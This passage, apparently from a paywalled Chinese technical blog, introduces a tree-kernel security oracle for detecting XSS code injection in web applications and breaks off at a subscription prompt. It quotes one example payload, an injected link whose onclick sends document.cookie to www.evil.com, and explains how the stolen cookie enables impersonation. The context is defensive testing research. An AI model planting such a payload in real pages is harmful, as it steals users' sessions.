基于树核方法的安全预言机:检测Web应用代码注入攻击
1. 代码注入攻击示例
在Web应用的安全领域,代码注入攻击是一个常见且危险的问题。例如,一个包含特定参数设置的HTML请求可能会引发成功的攻击。以下是一个示例,将参数 param 设置为后续的JavaScript代码:
<a href="" onclick="this.href= ’www.evil.com?data=’%2Bdocument.cookie"> click here</a>
当这个值被追加到响应页面时,它会改变页面的HTML结构( %2B 被解码为 “+”),注入一个新的链接 “click here”(即 <a> 标签),该链接指向攻击者控制的外部网站(即 www.evil.com )。如果合法用户触发了这个链接,其cookie将被编码为HTML请求参数并发送到攻击者控制的网站,攻击者就可以利用窃取的cookie冒充合法用户。
为了测试这种易受攻击的页面,我们可以采用多种策略自动生成输入值。但输入生成后,需要对输出进行验证,这就需要一个安全预言机来检查是否发生了代码注入。
2. 安全预言机的原理
2.1 攻击后果与页面结构变化
XSS攻击的目标是将JavaScript或HTML代码片段注入到网页中。成功注入的后果会表现为被攻击页面与正常运行页面相比的结构变化。然而,Web应用具有高度动态性,即使
超级会员免费看
订阅专栏 解锁全文
1682

被折叠的 条评论
为什么被折叠?



